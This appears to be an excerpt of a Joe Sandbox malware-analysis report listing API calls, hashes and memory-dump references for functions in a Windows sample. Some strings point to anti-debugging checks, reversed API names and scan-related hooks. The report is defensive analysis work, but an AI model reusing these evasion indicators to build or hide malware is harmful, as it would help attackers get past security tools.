                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileHandleWrite$Message
                                                                                                                                      • String ID: Error$Runtime error at 00000000
                                                                                                                                      • API String ID: 1570097196-2970929446
                                                                                                                                      • Opcode ID: 1659e76959190e42adde33f3cd0b3ba92d1046a6daf71c672ba42163ab5080ec
                                                                                                                                      • Instruction ID: 4435c255b176517c73a162365a1be197334918b929a7cab39282f228dc3dfcde
                                                                                                                                      • Opcode Fuzzy Hash: 1659e76959190e42adde33f3cd0b3ba92d1046a6daf71c672ba42163ab5080ec
                                                                                                                                      • Instruction Fuzzy Hash: 43F02B61AC03007DFA26B2606C45FA9335C0780F14F184F14F629A50C5C7E0D0C4EB17
                                                                                                                                      Function 02C3AE4C Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02C3ACC4: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02C3ACE1
                                                                                                                                        • Part of subcall function 02C3ACC4: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02C3AD05
                                                                                                                                        • Part of subcall function 02C3ACC4: GetModuleFileNameA.KERNEL32(02C30000,?,00000105), ref: 02C3AD20
                                                                                                                                        • Part of subcall function 02C3ACC4: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02C3ADB6
                                                                                                                                      • CharToOemA.USER32(?,?), ref: 02C3AE83
                                                                                                                                      • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02C3AEA0
                                                                                                                                      • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02C3AEA6
                                                                                                                                      • GetStdHandle.KERNEL32(000000F4,02C3AF10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02C3AEBB
                                                                                                                                      • WriteFile.KERNEL32(00000000,000000F4,02C3AF10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02C3AEC1
                                                                                                                                      • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02C3AEE3
                                                                                                                                      • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02C3AEF9
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 185507032-0
                                                                                                                                      • Opcode ID: 3cdb1e1079d2ed09eac8617d343a43c52f93f862fe091cbcaa29c48f8dff96f0
                                                                                                                                      • Instruction ID: d4233352ff44175dedb5bd16903c4da48ec38e41c75bf9db6e1bd15e338aeb36
                                                                                                                                      • Opcode Fuzzy Hash: 3cdb1e1079d2ed09eac8617d343a43c52f93f862fe091cbcaa29c48f8dff96f0
                                                                                                                                      • Instruction Fuzzy Hash: 55117CB25942047AD202FBA4DC80F8B77EDAB49700F904E26B394D60D0DA71E954DF6A
                                                                                                                                      Function 02C3E514 Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02C3E5AD
                                                                                                                                      • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02C3E5C9
                                                                                                                                      • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02C3E602
                                                                                                                                      • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02C3E67F
                                                                                                                                      • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02C3E698
                                                                                                                                      • VariantCopy.OLEAUT32(?,00000000), ref: 02C3E6CD
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 351091851-0
                                                                                                                                      • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                      • Instruction ID: 250173e70cce09fbf4083c1c8e621d2ccd232b5519ad99fd82c00229bccdb71a
                                                                                                                                      • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                      • Instruction Fuzzy Hash: 4351E776A0062D9BCB22EF58CC80BD9B3BDAF4C310F4049D5E509E7241D670AF859FA1
                                                                                                                                      Function 02C33568 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02C3358A
                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02C335D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02C335BD
                                                                                                                                      • RegCloseKey.ADVAPI32(?,02C335E0,00000000,?,00000004,00000000,02C335D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02C335D3
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                                      • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                      • API String ID: 3677997916-4173385793
                                                                                                                                      • Opcode ID: 82aca388bdd25c4647ebb4637bf456c56e225a0ac34865451210c4814984c531
                                                                                                                                      • Instruction ID: 0b342434a2abcecbe3b30433dc28f2d38b5a0328a8e2e7c0039e7d5b4f201a40
                                                                                                                                      • Opcode Fuzzy Hash: 82aca388bdd25c4647ebb4637bf456c56e225a0ac34865451210c4814984c531
                                                                                                                                      • Instruction Fuzzy Hash: 7F01B576944358BEE712DB90CD02BBD77FCEB48710F1009A1BA05E7580E675D610DA98
                                                                                                                                      Function 02C480C8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C48150,?,?,00000000,00000000,?,02C48069,00000000,KernelBASE,00000000,00000000,02C48090), ref: 02C48115
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C4811B
                                                                                                                                      • GetProcAddress.KERNEL32(?,?), ref: 02C4812D
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                                      • String ID: Kernel32$sserddAcorPteG
                                                                                                                                      • API String ID: 667068680-1372893251
                                                                                                                                      • Opcode ID: 0d788140306a305a8f6195daea772693f924d3d18cebf764bdea04ea2c4e92dc
                                                                                                                                      • Instruction ID: 48587fefb4ef0737ac743a98c3d6bd115b9af2fd2ca8a7f8289052ce4c0710ca
                                                                                                                                      • Opcode Fuzzy Hash: 0d788140306a305a8f6195daea772693f924d3d18cebf764bdea04ea2c4e92dc
                                                                                                                                      • Instruction Fuzzy Hash: 5B018B78A40304AFEB12EFA4DC42A9E77BEEB49720F514C65B40897A40DA70A900EA24
                                                                                                                                      Function 02C3A9D8 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetThreadLocale.KERNEL32(?,00000000,02C3AA6F,?,?,00000000), ref: 02C3A9F0
                                                                                                                                        • Part of subcall function 02C3A74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02C3A76A
                                                                                                                                      • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02C3AA6F,?,?,00000000), ref: 02C3AA20
                                                                                                                                      • EnumCalendarInfoA.KERNEL32(Function_0000A924,00000000,00000000,00000004), ref: 02C3AA2B
                                                                                                                                      • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02C3AA6F,?,?,00000000), ref: 02C3AA49
                                                                                                                                      • EnumCalendarInfoA.KERNEL32(Function_0000A960,00000000,00000000,00000003), ref: 02C3AA54
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4102113445-0
                                                                                                                                      • Opcode ID: 7320ec197e3b211b531ed187c96daaabb1f3f4f65e11bef9d9d8b58cbe809ecb
                                                                                                                                      • Instruction ID: 71ae910bc3fee8c3422a483577526f9701e89786a730d3c77d49c9bc7b53af51
                                                                                                                                      • Opcode Fuzzy Hash: 7320ec197e3b211b531ed187c96daaabb1f3f4f65e11bef9d9d8b58cbe809ecb
                                                                                                                                      • Instruction Fuzzy Hash: 7C0126726806487FF703E7B48D12B6E736DDB42720FA14D70F641E66D0D6349E109EA8
                                                                                                                                      Function 02C5BE87 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 210threadCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02C33538: GetKeyboardType.USER32(00000000), ref: 02C3353D
                                                                                                                                        • Part of subcall function 02C33538: GetKeyboardType.USER32(00000001), ref: 02C33549
                                                                                                                                      • GetCommandLineA.KERNEL32 ref: 02C5C06C
                                                                                                                                      • GetACP.KERNEL32 ref: 02C5C080
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 02C5C08A
                                                                                                                                        • Part of subcall function 02C33568: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02C3358A
                                                                                                                                        • Part of subcall function 02C33568: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02C335D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02C335BD
                                                                                                                                        • Part of subcall function 02C33568: RegCloseKey.ADVAPI32(?,02C335E0,00000000,?,00000004,00000000,02C335D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02C335D3
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: KeyboardType$CloseCommandCurrentLineOpenQueryThreadValue
                                                                                                                                      • String ID: p6X
                                                                                                                                      • API String ID: 3316616684-1193081329
                                                                                                                                      • Opcode ID: 9eb1ccbdb4d2412e0e109ee0a51fbe25bc01af1e3143d23d1712b820b1e3a122
                                                                                                                                      • Instruction ID: 7d041d0a59ec8c4d5398dbd046002f27c16a96c8545397e788b3fcd5c08132dd
                                                                                                                                      • Opcode Fuzzy Hash: 9eb1ccbdb4d2412e0e109ee0a51fbe25bc01af1e3143d23d1712b820b1e3a122
                                                                                                                                      • Instruction Fuzzy Hash: 830140A08453C19DD703ABB4A9442593FA1AF033147088EC9D8844F252D7644159EFE6
                                                                                                                                      Function 02C3AA88 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetThreadLocale.KERNEL32(?,00000000,02C3AC58,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02C3AAB7
                                                                                                                                        • Part of subcall function 02C3A74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02C3A76A
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Locale$InfoThread
                                                                                                                                      • String ID: eeee$ggg$yyyy
                                                                                                                                      • API String ID: 4232894706-1253427255
                                                                                                                                      • Opcode ID: 9c21b2bab52f79e8e0187b97da352eaf06b5bc594005e111e46be5afcd28109f
                                                                                                                                      • Instruction ID: 4dac28bdc36a2644a955f884d8219530221eb5369bede26d3bb543431d3decd9
                                                                                                                                      • Opcode Fuzzy Hash: 9c21b2bab52f79e8e0187b97da352eaf06b5bc594005e111e46be5afcd28109f
                                                                                                                                      • Instruction Fuzzy Hash: 814116717049054BC72BAB6A98903BEB3EBEB86304B104E65D4E2C7344D739DE25DE21
                                                                                                                                      Function 02C48020 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C48090,?,?,00000000,?,02C47A06,ntdll,00000000,00000000,02C47A4B,?,?,00000000), ref: 02C4805E
                                                                                                                                        • Part of subcall function 02C480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C48150,?,?,00000000,00000000,?,02C48069,00000000,KernelBASE,00000000,00000000,02C48090), ref: 02C48115
                                                                                                                                        • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C4811B
                                                                                                                                        • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(?,?), ref: 02C4812D
                                                                                                                                      • GetModuleHandleA.KERNELBASE(?), ref: 02C48072
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HandleModule$AddressProc
                                                                                                                                      • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                                                      • API String ID: 1883125708-1952140341
                                                                                                                                      • Opcode ID: 940a0b72a6fe25de4b7d80aeaf4828df07af5f2c7ddf5a509348e9898876dc6d
                                                                                                                                      • Instruction ID: a436c2aa72a5bb063f7112b783f18415bde15388d2dc6a01d48c1ca3cae94254
                                                                                                                                      • Opcode Fuzzy Hash: 940a0b72a6fe25de4b7d80aeaf4828df07af5f2c7ddf5a509348e9898876dc6d
                                                                                                                                      • Instruction Fuzzy Hash: E2F06D71650304AFEB15EFA4DC06A5F77ADFB49B50B914A60F40893A10DA70BD10AAA4
                                                                                                                                      Function 02C4EB94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleW.KERNEL32(KernelBase,?,02C4EF98,UacInitialize,02C9137C,02C5AFD8,OpenSession,02C9137C,02C5AFD8,ScanBuffer,02C9137C,02C5AFD8,ScanString,02C9137C,02C5AFD8,Initialize), ref: 02C4EB9A
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02C4EBAC
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                      • String ID: IsDebuggerPresent$KernelBase
                                                                                                                                      • API String ID: 1646373207-2367923768
                                                                                                                                      • Opcode ID: d6b9900660773215b13b0fa0724b1bd7e2204fc5617339e4e8b0f9b0237f6eb9
                                                                                                                                      • Instruction ID: 50c53b5d14de6b3eca0a0b74be4783f6b93ebddd65a665859ae07e810eee1991
                                                                                                                                      • Opcode Fuzzy Hash: d6b9900660773215b13b0fa0724b1bd7e2204fc5617339e4e8b0f9b0237f6eb9
                                                                                                                                      • Instruction Fuzzy Hash: 56D08CA2755B102EFA0236F40CC4C1F02CDA94557E3311FB1F023D20E2EEBAC912251C
                                                                                                                                      Function 02C3C3FC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,02C5C10B,00000000,02C5C11E), ref: 02C3C402
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02C3C413
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                      • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                      • API String ID: 1646373207-3712701948
                                                                                                                                      • Opcode ID: 71116016c06f0e7badf08e4a1a20d8afb59c0ab4cd23d123224b005e17396179
                                                                                                                                      • Instruction ID: 030d351b909bcbc0cb7d0b4fdb7bd25a03656fb0cced5449c9294a99844b7861
                                                                                                                                      • Opcode Fuzzy Hash: 71116016c06f0e7badf08e4a1a20d8afb59c0ab4cd23d123224b005e17396179
                                                                                                                                      • Instruction Fuzzy Hash: 63D09EA0A413115EE7035AB5688073A26DC9B48765B506D36A053B5102D779C6645FD8
                                                                                                                                      Function 02C3E170 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02C3E21F
                                                                                                                                      • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02C3E23B
                                                                                                                                      • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02C3E2B2
                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 02C3E2DB
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 920484758-0
                                                                                                                                      • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                      • Instruction ID: 3b7898a9d6c98dedc408e9b152c3273dfae60fde3442c76c9b45bdd15c62694a
                                                                                                                                      • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                      • Instruction Fuzzy Hash: BA4108B5A0061D9BCB62DB59CC90BD9B3BDBF4C314F0049E5E649E7252DA31AF809F50
                                                                                                                                      Function 02C3ACC4 Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
